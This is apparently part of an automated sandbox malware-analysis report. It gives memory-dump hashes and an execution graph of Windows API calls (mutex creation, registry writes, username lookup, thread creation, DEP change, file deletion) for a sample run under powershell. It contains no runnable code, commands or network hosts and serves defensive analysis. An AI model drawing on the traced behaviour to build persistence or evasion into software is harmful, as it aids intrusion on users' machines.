              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: L4#p$L4#p$L4#p$L:1$L:1
              • API String ID: 0-599910482
              • Opcode ID: 0a113308e9500a8b6d219565a74fca152036f4a4f1f9ede8a0e6dba397184f56
              • Instruction ID: bd7ba5f181d761c3f813fcfc3e6bb382b8f78c5d038e91580a7bf2abc4050479
              • Opcode Fuzzy Hash: 0a113308e9500a8b6d219565a74fca152036f4a4f1f9ede8a0e6dba397184f56
              • Instruction Fuzzy Hash: A341F479A00308EFDF6EAF65C4407BD77A6AF84300F1A80A5E905AB291D7B0DD89CB51
              Function 003807C0 Relevance: 5.2, Strings: 4, Instructions: 208COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.466003822.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_12_2_380000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $;1$L4#p$L4#p$L4#p
              • API String ID: 0-2145922905
              • Opcode ID: 1e38c2cdb7370f07f2ed5f28cc2c4e5bf12e378a61df07b5ad22f5dae63e0058
              • Instruction ID: a57fde9a698065c648d579bc7d99171f16c5fc52aff827307f37167ae315e503
              • Opcode Fuzzy Hash: 1e38c2cdb7370f07f2ed5f28cc2c4e5bf12e378a61df07b5ad22f5dae63e0058
              • Instruction Fuzzy Hash: 00618B34704344EFEF1BAF24C8507BE7BA6AF85300F1580A9E9419B2A2DB70DD85C791

              Executed Functions

              Function 0019D01D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.463805937.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_19d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd1faae2a34aa8853549d616751d8103fada914ede98f9319c82f606ea074d65
              • Instruction ID: 6a7bb92a16d92fabe298565befad1b59a242631eaeb59da8a7b694ca7efe0437
              • Opcode Fuzzy Hash: dd1faae2a34aa8853549d616751d8103fada914ede98f9319c82f606ea074d65
              • Instruction Fuzzy Hash: 4701A271504340EAEB248E25EC84BA7BB98EF81764F2CC55AFC494F282C3799945CAB1
              Function 0019D01C Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000D.00000002.463805937.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_13_2_19d000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d8aa0267538ee8126d56b09bc9baaea4896060d1d63a394d0d921bf9d85209fb
              • Instruction ID: 5a3db4e9a5a1f4c65d7bcc38db105dac75e0de269e0279d7fb0ac6edbfe287e4
              • Opcode Fuzzy Hash: d8aa0267538ee8126d56b09bc9baaea4896060d1d63a394d0d921bf9d85209fb
              • Instruction Fuzzy Hash: 94F06D71504244AEEB248E16DCC8BA2FB98EB81724F18C55AED485B282C3799C45CAB1

              Execution Graph

              Execution Coverage:4.9%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:5.3%
              Total number of Nodes:1625
              Total number of Limit Nodes:62
              execution_graph 47239 40a3e0 47249 436e90 47239->47249 47242 40a4d6 47243 40a4e6 ToUnicodeEx 47242->47243 47243->47243 47244 40a4cd 47243->47244 47251 40417e 47244->47251 47245 40a468 ___scrt_fastfail 47245->47244 47247 40a4a4 ToUnicodeEx 47245->47247 47247->47244 47250 40a401 6 API calls 47249->47250 47250->47242 47250->47245 47252 404186 47251->47252 47257 402252 47252->47257 47254 404191 47261 4041bc 47254->47261 47258 40225c 47257->47258 47259 4022ac 47257->47259 47258->47259 47265 402779 11 API calls std::_Deallocate 47258->47265 47259->47254 47262 4041c8 47261->47262 47266 4041d9 47262->47266 47264 40419c 47265->47259 47267 4041e9 47266->47267 47268 404206 47267->47268 47269 4041ef 47267->47269 47283 4027e6 47268->47283 47273 404267 47269->47273 47272 404204 47272->47264 47294 402888 47273->47294 47275 40427b 47276 404290 47275->47276 47277 4042a5 47275->47277 47299 4042df 22 API calls 47276->47299 47278 4027e6 28 API calls 47277->47278 47280 4042a3 47278->47280 47280->47272 47281 404299 47300 402c48 22 API calls 47281->47300 47284 4027ef 47283->47284 47285 402851 47284->47285 47286 4027f9 47284->47286 47303 4028a4 22 API calls 47285->47303 47289 402802 47286->47289 47290 402815 47286->47290 47302 402aea 28 API calls __EH_prolog 47289->47302 47292 402813 47290->47292 47293 402252 11 API calls 47290->47293 47292->47272 47293->47292 47295 402890 47294->47295 47296 402898 47295->47296 47301 402ca3 22 API calls 47295->47301 47296->47275 47299->47281 47300->47280 47302->47292 47304 445847 47305 445852 47304->47305 47307 44587b 47305->47307 47309 445877 47305->47309 47310 448a84 47305->47310 47317 44589f DeleteCriticalSection 47307->47317 47318 4484ca 47310->47318 47313 448ac9 InitializeCriticalSectionAndSpinCount 47314 448ab4 47313->47314 47325 434fcb 47314->47325 47316 448ae0 47316->47305 47317->47309 47319 4484f6 47318->47319 47320 4484fa 47318->47320 47319->47320 47324 44851a 47319->47324 47332 448566 47319->47332 47320->47313 47320->47314 47322 448526 GetProcAddress 47323 448536 __crt_fast_encode_pointer 47322->47323 47323->47320 47324->47320 47324->47322 47326 434fd6 IsProcessorFeaturePresent 47325->47326 47327 434fd4 47325->47327 47329 435018 47326->47329 47327->47316 47339 434fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47329->47339 47331 4350fb 47331->47316 47333 448587 LoadLibraryExW 47332->47333 47337 44857c 47332->47337 47334 4485a4 GetLastError 47333->47334 47335 4485bc 47333->47335 47334->47335 47338 4485af LoadLibraryExW 47334->47338 47336 4485d3 FreeLibrary 47335->47336 47335->47337 47336->47337 47337->47319 47338->47335 47339->47331 47340 434887 47341 434893 ___DestructExceptionObject 47340->47341 47367 434596 47341->47367 47343 43489a 47345 4348c3 47343->47345 47673 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47343->47673 47353 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47345->47353 47378 444251 47345->47378 47348 4348e2 ___DestructExceptionObject 47350 434962 47386 434b14 47350->47386 47353->47350 47674 4433e7 36 API calls 6 library calls 47353->47674 47360 434984 47361 43498e 47360->47361 47676 44341f 28 API calls _Atexit 47360->47676 47363 434997 47361->47363 47677 4433c2 28 API calls _Atexit 47361->47677 47678 43470d 13 API calls 2 library calls 47363->47678 47366 43499f 47366->47348 47368 43459f 47367->47368 47679 434c52 IsProcessorFeaturePresent 47368->47679 47370 4345ab 47680 438f31 47370->47680 47372 4345b0 47377 4345b4 47372->47377 47689 4440bf 47372->47689 47375 4345cb 47375->47343 47377->47343 47379 444268 47378->47379 47380 434fcb CatchGuardHandler 5 API calls 47379->47380 47381 4348dc 47380->47381 47381->47348 47382 4441f5 47381->47382 47385 444224 47382->47385 47383 434fcb CatchGuardHandler 5 API calls 47384 44424d 47383->47384 47384->47353 47385->47383 47387 436e90 ___scrt_fastfail 47386->47387 47388 434b27 GetStartupInfoW 47387->47388 47389 434968 47388->47389 47390 4441a2 47389->47390 47739 44f059 47390->47739 47392 434971 47395 40e9c5 47392->47395 47393 4441ab 47393->47392 47743 446815 36 API calls 47393->47743 47914 41cb50 LoadLibraryA GetProcAddress 47395->47914 47397 40e9e1 GetModuleFileNameW 47919 40f3c3 47397->47919 47399 40e9fd 47934 4020f6 47399->47934 47402 4020f6 28 API calls 47403 40ea1b 47402->47403 47940 41be1b 47403->47940 47407 40ea2d 47966 401e8d 47407->47966 47409 40ea36 47410 40ea93 47409->47410 47411 40ea49 47409->47411 47972 401e65 47410->47972 48241 40fbb3 118 API calls 47411->48241 47414 40eaa3 47418 401e65 22 API calls 47414->47418 47415 40ea5b 47416 401e65 22 API calls 47415->47416 47417 40ea67 47416->47417 48242 410f37 36 API calls __EH_prolog 47417->48242 47419 40eac2 47418->47419 47977 40531e 47419->47977 47422 40ea79 48243 40fb64 78 API calls 47422->48243 47423 40ead1 47982 406383 47423->47982 47426 40ea82 48244 40f3b0 71 API calls 47426->48244 47433 401fd8 11 API calls 47435 40eefb 47433->47435 47434 401fd8 11 API calls 47436 40eafb 47434->47436 47675 4432f6 GetModuleHandleW 47435->47675 47437 401e65 22 API calls 47436->47437 47438 40eb04 47437->47438 47999 401fc0 47438->47999 47440 40eb0f 47441 401e65 22 API calls 47440->47441 47442 40eb28 47441->47442 47443 401e65 22 API calls 47442->47443 47444 40eb43 47443->47444 47445 40ebae 47444->47445 48245 406c1e 47444->48245 47446 401e65 22 API calls 47445->47446 47452 40ebbb 47446->47452 47448 40eb70 47449 401fe2 28 API calls 47448->47449 47450 40eb7c 47449->47450 47453 401fd8 11 API calls 47450->47453 47451 40ec02 48003 40d069 47451->48003 47452->47451 47458 413549 3 API calls 47452->47458 47454 40eb85 47453->47454 48250 413549 RegOpenKeyExA 47454->48250 47456 40ec08 47457 40ea8b 47456->47457 48006 41b2c3 47456->48006 47457->47433 47464 40ebe6 47458->47464 47462 40ec23 47465 40ec76 47462->47465 48023 407716 47462->48023 47463 40f34f 48333 4139a9 30 API calls 47463->48333 47464->47451 48253 4139a9 30 API calls 47464->48253 47468 401e65 22 API calls 47465->47468 47471 40ec7f 47468->47471 47470 40f365 48334 412475 65 API calls ___scrt_fastfail 47470->48334 47479 40ec90 47471->47479 47480 40ec8b 47471->47480 47474 40ec42 48254 407738 30 API calls 47474->48254 47475 40ec4c 47477 401e65 22 API calls 47475->47477 47489 40ec55 47477->47489 47478 40f36f 47482 41bc5e 28 API calls 47478->47482 47485 401e65 22 API calls 47479->47485 48257 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47480->48257 47481 40ec47 48255 407260 98 API calls 47481->48255 47486 40f37f 47482->47486 47487 40ec99 47485->47487 48133 413a23 RegOpenKeyExW 47486->48133 48027 41bc5e 47487->48027 47489->47465 47493 40ec71 47489->47493 47490 40eca4 48031 401f13 47490->48031 48256 407260 98 API calls 47493->48256 47497 401f09 11 API calls 47499 40f39c 47497->47499 47501 401f09 11 API calls 47499->47501 47503 40f3a5 47501->47503 47502 401e65 22 API calls 47505 40ecc1 47502->47505 48136 40dd42 47503->48136 47508 401e65 22 API calls 47505->47508 47510 40ecdb 47508->47510 47509 40f3af 47511 401e65 22 API calls 47510->47511 47512 40ecf5 47511->47512 47513 401e65 22 API calls 47512->47513 47514 40ed0e 47513->47514 47516 401e65 22 API calls 47514->47516 47546 40ed7b 47514->47546 47515 40ed8a 47517 40ed93 47515->47517 47521 40ee0f ___scrt_fastfail 47515->47521 47520 40ed23 _wcslen 47516->47520 47518 401e65 22 API calls 47517->47518 47519 40ed9c 47518->47519 47522 401e65 22 API calls 47519->47522 47524 401e65 22 API calls 47520->47524 47520->47546 48043 413947 47521->48043 47525 40edae 47522->47525 47523 40ef06 ___scrt_fastfail 48318 4136f8 RegOpenKeyExA 47523->48318 47527 40ed3e 47524->47527 47528 401e65 22 API calls 47525->47528 47530 401e65 22 API calls 47527->47530 47531 40edc0 47528->47531 47529 40ef51 47534 401e65 22 API calls 47529->47534 47532 40ed53 47530->47532 47533 401e65 22 API calls 47531->47533 48258 40da34 47532->48258 47535 40ede9 47533->47535 47536 40ef76 47534->47536 47540 401e65 22 API calls 47535->47540 48053 402093 47536->48053 47539 401f13 28 API calls 47542 40ed72 47539->47542 47544 40edfa 47540->47544 47543 401f09 11 API calls 47542->47543 47543->47546 48316 40cdf9 45 API calls _wcslen 47544->48316 47545 40ef88 48059 41376f RegCreateKeyA 47545->48059 47546->47515 47546->47523 47550 40eea3 ctype 47555 401e65 22 API calls 47550->47555 47551 40ee0a 47551->47521 47553 401e65 22 API calls 47554 40efaa 47553->47554 48065 43baac 47554->48065 47556 40eeba 47555->47556 47556->47529 47560 40eece 47556->47560 47559 40efc1 48321 41cd9b 87 API calls ___scrt_fastfail 47559->48321 47562 401e65 22 API calls 47560->47562 47561 40efe4 47566 402093 28 API calls 47561->47566 47564 40eed7 47562->47564 47567 41bc5e 28 API calls 47564->47567 47565 40efc8 CreateThread 47565->47561 49204 41d45d 10 API calls 47565->49204 47568 40eff9 47566->47568 47569 40eee3 47567->47569 47571 402093 28 API calls 47568->47571 48317 40f474 104 API calls 47569->48317 47572 40f008 47571->47572 48069 41b4ef 47572->48069 47573 40eee8 47573->47529 47575 40eeef 47573->47575 47575->47457 47577 401e65 22 API calls 47578 40f019 47577->47578 47579 401e65 22 API calls 47578->47579 47580 40f02b 47579->47580 47581 401e65 22 API calls 47580->47581 47582 40f04b 47581->47582 47583 43baac _strftime 40 API calls 47582->47583 47584 40f058 47583->47584 47585 401e65 22 API calls 47584->47585 47586 40f063 47585->47586 47587 401e65 22 API calls 47586->47587 47588 40f074 47587->47588 47589 401e65 22 API calls 47588->47589 47590 40f089 47589->47590 47591 401e65 22 API calls 47590->47591 47592 40f09a 47591->47592 47593 40f0a1 StrToIntA 47592->47593 48093 409de4 47593->48093 47596 401e65 22 API calls 47597 40f0bc 47596->47597 47598 40f101 47597->47598 47599 40f0c8 47597->47599 47601 401e65 22 API calls 47598->47601 48322 4344ea 47599->48322 47603 40f111 47601->47603 47606 40f159 47603->47606 47607 40f11d 47603->47607 47604 401e65 22 API calls 47605 40f0e4 47604->47605 47608 40f0eb CreateThread 47605->47608 47610 401e65 22 API calls 47606->47610 47609 4344ea new 22 API calls 47607->47609 47608->47598 49202 419fb4 103 API calls 2 library calls 47608->49202 47611 40f126 47609->47611 47612 40f162 47610->47612 47613 401e65 22 API calls 47611->47613 47615 40f1cc 47612->47615 47616 40f16e 47612->47616 47614 40f138 47613->47614 47619 40f13f CreateThread 47614->47619 47617 401e65 22 API calls 47615->47617 47618 401e65 22 API calls 47616->47618 47620 40f1d5 47617->47620 47621 40f17e 47618->47621 47619->47606 49201 419fb4 103 API calls 2 library calls 47619->49201 47622 40f1e1 47620->47622 47623 40f21a 47620->47623 47624 401e65 22 API calls 47621->47624 47626 401e65 22 API calls 47622->47626 48118 41b60d 47623->48118 47627 40f193 47624->47627 47629 40f1ea 47626->47629 48329 40d9e8 31 API calls 47627->48329 47634 401e65 22 API calls 47629->47634 47630 401f13 28 API calls 47631 40f22e 47630->47631 47633 401f09 11 API calls 47631->47633 47636 40f237 47633->47636 47637 40f1ff 47634->47637 47635 40f1a6 47638 401f13 28 API calls 47635->47638 47639 40f240 SetProcessDEPPolicy 47636->47639 47640 40f243 CreateThread 47636->47640 47647 43baac _strftime 40 API calls 47637->47647 47641 40f1b2 47638->47641 47639->47640 47642 40f264 47640->47642 47643 40f258 CreateThread 47640->47643 49173 40f7a7 47640->49173 47644 401f09 11 API calls 47641->47644 47645 40f279 47642->47645 47646 40f26d CreateThread 47642->47646 47643->47642 49203 4120f7 138 API calls 47643->49203 47648 40f1bb CreateThread 47644->47648 47650 40f2cc 47645->47650 47652 402093 28 API calls 47645->47652 47646->47645 49205 4126db 38 API calls ___scrt_fastfail 47646->49205 47649 40f20c 47647->47649 47648->47615 49200 401be9 50 API calls _strftime 47648->49200 48330 40c162 7 API calls 47649->48330 48130 4134ff RegOpenKeyExA 47650->48130 47653 40f29c 47652->47653 48331 4052fd 28 API calls 47653->48331 47659 40f2ed 47660 41bc5e 28 API calls 47659->47660 47662 40f2fd 47660->47662 48332 41361b 31 API calls 47662->48332 47667 40f313 47668 401f09 11 API calls 47667->47668 47671 40f31e 47668->47671 47669 40f346 DeleteFileW 47670 40f34d 47669->47670 47669->47671 47670->47478 47671->47478 47671->47669 47672 40f334 Sleep 47671->47672 47672->47671 47673->47343 47674->47350 47675->47360 47676->47361 47677->47363 47678->47366 47679->47370 47681 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47680->47681 47693 43a43a 47681->47693 47685 438f4c 47686 438f57 47685->47686 47707 43a476 DeleteCriticalSection 47685->47707 47686->47372 47688 438f44 47688->47372 47735 44fb68 47689->47735 47692 438f5a 8 API calls 3 library calls 47692->47377 47694 43a443 47693->47694 47696 43a46c 47694->47696 47697 438f40 47694->47697 47708 438e7f 47694->47708 47713 43a476 DeleteCriticalSection 47696->47713 47697->47688 47699 43a3ec 47697->47699 47728 438d94 47699->47728 47701 43a3f6 47702 43a401 47701->47702 47733 438e42 6 API calls try_get_function 47701->47733 47702->47685 47704 43a40f 47705 43a41c 47704->47705 47734 43a41f 6 API calls ___vcrt_FlsFree 47704->47734 47705->47685 47707->47688 47714 438c73 47708->47714 47711 438eb6 InitializeCriticalSectionAndSpinCount 47712 438ea2 47711->47712 47712->47694 47713->47697 47715 438ca3 47714->47715 47716 438ca7 47714->47716 47715->47716 47720 438cc7 47715->47720 47721 438d13 47715->47721 47716->47711 47716->47712 47718 438cd3 GetProcAddress 47719 438ce3 __crt_fast_encode_pointer 47718->47719 47719->47716 47720->47716 47720->47718 47722 438d3b LoadLibraryExW 47721->47722 47727 438d30 47721->47727 47723 438d57 GetLastError 47722->47723 47724 438d6f 47722->47724 47723->47724 47725 438d62 LoadLibraryExW 47723->47725 47726 438d86 FreeLibrary 47724->47726 47724->47727 47725->47724 47726->47727 47727->47715 47729 438c73 try_get_function 5 API calls 47728->47729 47730 438dae 47729->47730 47731 438dc6 TlsAlloc 47730->47731 47732 438db7 47730->47732 47732->47701 47733->47704 47734->47702 47738 44fb81 47735->47738 47736 434fcb CatchGuardHandler 5 API calls 47737 4345bd 47736->47737 47737->47375 47737->47692 47738->47736 47740 44f06b 47739->47740 47741 44f062 47739->47741 47740->47393 47744 44ef58 47741->47744 47743->47393 47764 448215 GetLastError 47744->47764 47746 44ef65 47785 44f077 47746->47785 47748 44ef6d 47794 44ecec 47748->47794 47753 44efc7 47819 446782 20 API calls __dosmaperr 47753->47819 47757 44ef84 47757->47740 47758 44efc2 47818 4405dd 20 API calls __dosmaperr 47758->47818 47760 44f00b 47760->47753 47821 44ebc2 20 API calls 47760->47821 47761 44efdf 47761->47760 47820 446782 20 API calls __dosmaperr 47761->47820 47765 448237 47764->47765 47766 44822b 47764->47766 47823 445af3 20 API calls 3 library calls 47765->47823 47822 4487bc 11 API calls 2 library calls 47766->47822 47769 448231 47769->47765 47771 448280 SetLastError 47769->47771 47770 448243 47776 44824b 47770->47776 47825 448812 11 API calls 2 library calls 47770->47825 47771->47746 47774 448260 47774->47776 47777 448267 47774->47777 47775 448251 47779 44828c SetLastError 47775->47779 47824 446782 20 API calls __dosmaperr 47776->47824 47826 448087 20 API calls __Toupper 47777->47826 47828 4460f4 36 API calls 4 library calls 47779->47828 47780 448272 47827 446782 20 API calls __dosmaperr 47780->47827 47783 448298 47784 448279 47784->47771 47784->47779 47786 44f083 ___DestructExceptionObject 47785->47786 47787 448215 __Toupper 36 API calls 47786->47787 47792 44f08d 47787->47792 47789 44f111 ___DestructExceptionObject 47789->47748 47792->47789 47829 4460f4 36 API calls 4 library calls 47792->47829 47830 445888 EnterCriticalSection 47792->47830 47831 446782 20 API calls __dosmaperr 47792->47831 47832 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 47792->47832 47833 43a7b7 47794->47833 47797 44ed0d GetOEMCP 47800 44ed36 47797->47800 47798 44ed1f 47799 44ed24 GetACP 47798->47799 47798->47800 47799->47800 47800->47757 47801 446137 47800->47801 47802 446175 47801->47802 47806 446145 ___crtLCMapStringA 47801->47806 47844 4405dd 20 API calls __dosmaperr 47802->47844 47803 446160 RtlAllocateHeap 47805 446173 47803->47805 47803->47806 47805->47753 47808 44f119 47805->47808 47806->47802 47806->47803 47843 442f80 7 API calls 2 library calls 47806->47843 47809 44ecec 38 API calls 47808->47809 47810 44f138 47809->47810 47813 44f189 IsValidCodePage 47810->47813 47815 44f13f 47810->47815 47817 44f1ae ___scrt_fastfail 47810->47817 47811 434fcb CatchGuardHandler 5 API calls 47812 44efba 47811->47812 47812->47758 47812->47761 47814 44f19b GetCPInfo 47813->47814 47813->47815 47814->47815 47814->47817 47815->47811 47845 44edc4 GetCPInfo 47817->47845 47818->47753 47819->47757 47820->47760 47821->47753 47822->47769 47823->47770 47824->47775 47825->47774 47826->47780 47827->47784 47828->47783 47829->47792 47830->47792 47831->47792 47832->47792 47834 43a7ca 47833->47834 47835 43a7d4 47833->47835 47834->47797 47834->47798 47835->47834 47836 448215 __Toupper 36 API calls 47835->47836 47837 43a7f5 47836->47837 47841 448364 36 API calls __Toupper 47837->47841 47839 43a80e 47842 448391 36 API calls __cftoe 47839->47842 47841->47839 47842->47834 47843->47806 47844->47805 47851 44edfe 47845->47851 47854 44eea8 47845->47854 47847 434fcb CatchGuardHandler 5 API calls 47850 44ef54 47847->47850 47850->47815 47855 45112c 47851->47855 47853 44ae66 _swprintf 41 API calls 47853->47854 47854->47847 47856 43a7b7 __cftoe 36 API calls 47855->47856 47857 45114c MultiByteToWideChar 47856->47857 47859 451222 47857->47859 47860 45118a 47857->47860 47861 434fcb CatchGuardHandler 5 API calls 47859->47861 47863 446137 ___crtLCMapStringA 21 API calls 47860->47863 47865 4511ab __alloca_probe_16 ___scrt_fastfail 47860->47865 47864 44ee5f 47861->47864 47862 45121c 47874 435e40 20 API calls _free 47862->47874 47863->47865 47869 44ae66 47864->47869 47865->47862 47867 4511f0 MultiByteToWideChar 47865->47867 47867->47862 47868 45120c GetStringTypeW 47867->47868 47868->47862 47870 43a7b7 __cftoe 36 API calls 47869->47870 47871 44ae79 47870->47871 47875 44ac49 47871->47875 47874->47859 47876 44ac64 ___crtLCMapStringA 47875->47876 47877 44ac8a MultiByteToWideChar 47876->47877 47878 44acb4 47877->47878 47879 44ae3e 47877->47879 47882 446137 ___crtLCMapStringA 21 API calls 47878->47882 47885 44acd5 __alloca_probe_16 47878->47885 47880 434fcb CatchGuardHandler 5 API calls 47879->47880 47881 44ae51 47880->47881 47881->47853 47882->47885 47883 44ad8a 47911 435e40 20 API calls _free 47883->47911 47884 44ad1e MultiByteToWideChar 47884->47883 47886 44ad37 47884->47886 47885->47883 47885->47884 47902 448bb3 47886->47902 47890 44ad61 47890->47883 47894 448bb3 _strftime 11 API calls 47890->47894 47891 44ad99 47892 446137 ___crtLCMapStringA 21 API calls 47891->47892 47896 44adba __alloca_probe_16 47891->47896 47892->47896 47893 44ae2f 47910 435e40 20 API calls _free 47893->47910 47894->47883 47896->47893 47897 448bb3 _strftime 11 API calls 47896->47897 47898 44ae0e 47897->47898 47898->47893 47899 44ae1d WideCharToMultiByte 47898->47899 47899->47893 47900 44ae5d 47899->47900 47912 435e40 20 API calls _free 47900->47912 47903 4484ca __Toupper 5 API calls 47902->47903 47904 448bda 47903->47904 47907 448be3 47904->47907 47913 448c3b 10 API calls 3 library calls 47904->47913 47906 448c23 LCMapStringW 47906->47907 47908 434fcb CatchGuardHandler 5 API calls 47907->47908 47909 448c35 47908->47909 47909->47883 47909->47890 47909->47891 47910->47883 47911->47879 47912->47883 47913->47906 47915 41cb8f LoadLibraryA GetProcAddress 47914->47915 47916 41cb7f GetModuleHandleA GetProcAddress 47914->47916 47917 41cbb8 44 API calls 47915->47917 47918 41cba8 LoadLibraryA GetProcAddress 47915->47918 47916->47915 47917->47397 47918->47917 48335 41b4a8 FindResourceA 47919->48335 47923 40f3ed ctype 48345 4020b7 47923->48345 47926 401fe2 28 API calls 47927 40f413 47926->47927 47928 401fd8 11 API calls 47927->47928 47929 40f41c 47928->47929 47930 43bd51 _Yarn 21 API calls 47929->47930 47931 40f42d ctype 47930->47931 48351 406dd8 47931->48351 47933 40f460 47933->47399 47935 40210c 47934->47935 47936 4023ce 11 API calls 47935->47936 47937 402126 47936->47937 47938 402569 28 API calls 47937->47938 47939 402134 47938->47939 47939->47402 48399 4020df 47940->48399 47942 401fd8 11 API calls 47943 41bed0 47942->47943 47944 401fd8 11 API calls 47943->47944 47946 41bed8 47944->47946 47945 41bea0 47947 4041a2 28 API calls 47945->47947 47949 401fd8 11 API calls 47946->47949 47950 41beac 47947->47950 47951 40ea24 47949->47951 47952 401fe2 28 API calls 47950->47952 47962 40fb17 47951->47962 47954 41beb5 47952->47954 47953 401fe2 28 API calls 47955 41be2e 47953->47955 47957 401fd8 11 API calls 47954->47957 47955->47945 47955->47953 47956 401fd8 11 API calls 47955->47956 47961 41be9e 47955->47961 48403 4041a2 47955->48403 48406 41ce34 28 API calls 47955->48406 47956->47955 47958 41bebd 47957->47958 48407 41ce34 28 API calls 47958->48407 47961->47942 47963 40fb23 47962->47963 47965 40fb2a 47962->47965 48414 402163 11 API calls 47963->48414 47965->47407 47967 402163 47966->47967 47968 40219f 47967->47968 48415 402730 11 API calls 47967->48415 47968->47409 47970 402184 48416 402712 11 API calls std::_Deallocate 47970->48416 47973 401e6d 47972->47973 47974 401e75 47973->47974 48417 402158 22 API calls 47973->48417 47974->47414 47978 4020df 11 API calls 47977->47978 47979 40532a 47978->47979 48418 4032a0 47979->48418 47981 405346 47981->47423 48422 4051ef 47982->48422 47984 406391 48426 402055 47984->48426 47987 401fe2 47988 401ff1 47987->47988 47995 402039 47987->47995 47989 4023ce 11 API calls 47988->47989 47990 401ffa 47989->47990 47991 40203c 47990->47991 47992 402015 47990->47992 47993 40267a 11 API calls 47991->47993 48458 403098 28 API calls 47992->48458 47993->47995 47996 401fd8 47995->47996 47997 4023ce 11 API calls 47996->47997 47998 401fe1 47997->47998 47998->47434 48000 401fd2 47999->48000 48001 401fc9 47999->48001 48000->47440 48459 4025e0 28 API calls 48001->48459 48460 401fab 48003->48460 48005 40d073 CreateMutexA GetLastError 48005->47456 48461 41bfb7 48006->48461 48011 401fe2 28 API calls 48012 41b2ff 48011->48012 48013 401fd8 11 API calls 48012->48013 48014 41b307 48013->48014 48015 4135a6 31 API calls 48014->48015 48017 41b35d 48014->48017 48016 41b330 48015->48016 48018 41b33b StrToIntA 48016->48018 48017->47462 48019 41b349 48018->48019 48022 41b352 48018->48022 48469 41cf69 22 API calls 48019->48469 48021 401fd8 11 API calls 48021->48017 48022->48021 48024 40772a 48023->48024 48025 413549 3 API calls 48024->48025 48026 407731 48025->48026 48026->47474 48026->47475 48028 41bc72 48027->48028 48470 40b904 48028->48470 48030 41bc7a 48030->47490 48032 401f22 48031->48032 48033 401f6a 48031->48033 48034 402252 11 API calls 48032->48034 48040 401f09 48033->48040 48035 401f2b 48034->48035 48036 401f6d 48035->48036 48038 401f46 48035->48038 48485 402336 48036->48485 48484 40305c 28 API calls 48038->48484 48041 402252 11 API calls 48040->48041 48042 401f12 48041->48042 48042->47502 48044 413965 48043->48044 48045 406dd8 28 API calls 48044->48045 48046 41397a 48045->48046 48047 4020f6 28 API calls 48046->48047 48048 41398a 48047->48048 48049 41376f 14 API calls 48048->48049 48050 413994 48049->48050 48051 401fd8 11 API calls 48050->48051 48052 4139a1 48051->48052 48052->47550 48054 40209b 48053->48054 48055 4023ce 11 API calls 48054->48055 48056 4020a6 48055->48056 48489 4024ed 48056->48489 48060 4137bf 48059->48060 48061 413788 48059->48061 48062 401fd8 11 API calls 48060->48062 48064 41379a RegSetValueExA RegCloseKey 48061->48064 48063 40ef9e 48062->48063 48063->47553 48064->48060 48066 43bac5 _strftime 48065->48066 48493 43ae03 48066->48493 48068 40efb7 48068->47559 48068->47561 48070 41b5a0 48069->48070 48071 41b505 GetLocalTime 48069->48071 48073 401fd8 11 API calls 48070->48073 48072 40531e 28 API calls 48071->48072 48075 41b547 48072->48075 48074 41b5a8 48073->48074 48076 401fd8 11 API calls 48074->48076 48077 406383 28 API calls 48075->48077 48078 40f00d 48076->48078 48079 41b553 48077->48079 48078->47577 48520 402f10 48079->48520 48082 406383 28 API calls 48083 41b56b 48082->48083 48525 407200 77 API calls 48083->48525 48085 41b579 48086 401fd8 11 API calls 48085->48086 48087 41b585 48086->48087 48088 401fd8 11 API calls 48087->48088 48089 41b58e 48088->48089 48090 401fd8 11 API calls 48089->48090 48091 41b597 48090->48091 48092 401fd8 11 API calls 48091->48092 48092->48070 48094 409e02 _wcslen 48093->48094 48095 409e24 48094->48095 48096 409e0d 48094->48096 48098 40da34 31 API calls 48095->48098 48097 40da34 31 API calls 48096->48097 48099 409e15 48097->48099 48100 409e2c 48098->48100 48101 401f13 28 API calls 48099->48101 48102 401f13 28 API calls 48100->48102 48103 409e1f 48101->48103 48104 409e3a 48102->48104 48106 401f09 11 API calls 48103->48106 48105 401f09 11 API calls 48104->48105 48107 409e42 48105->48107 48108 409e79 48106->48108 48544 40915b 28 API calls 48107->48544 48529 40a109 48108->48529 48111 409e54 48545 403014 48111->48545 48115 401f13 28 API calls 48116 409e69 48115->48116 48117 401f09 11 API calls 48116->48117 48117->48103 48119 41b630 GetUserNameW 48118->48119 48120 40417e 28 API calls 48119->48120 48121 41b65c 48120->48121 48736 4042fc 48121->48736 48124 403014 28 API calls 48125 41b672 48124->48125 48126 401f09 11 API calls 48125->48126 48127 41b67b 48126->48127 48128 401f09 11 API calls 48127->48128 48129 40f223 48128->48129 48129->47630 48131 413520 RegQueryValueExA RegCloseKey 48130->48131 48132 40f2e4 48130->48132 48131->48132 48132->47503 48132->47659 48134 40f392 48133->48134 48135 413a3f RegDeleteValueW 48133->48135 48134->47497 48135->48134 48137 40dd5b 48136->48137 48138 4134ff 3 API calls 48137->48138 48139 40dd62 48138->48139 48140 40dd81 48139->48140 48813 401707 48139->48813 48144 414f2a 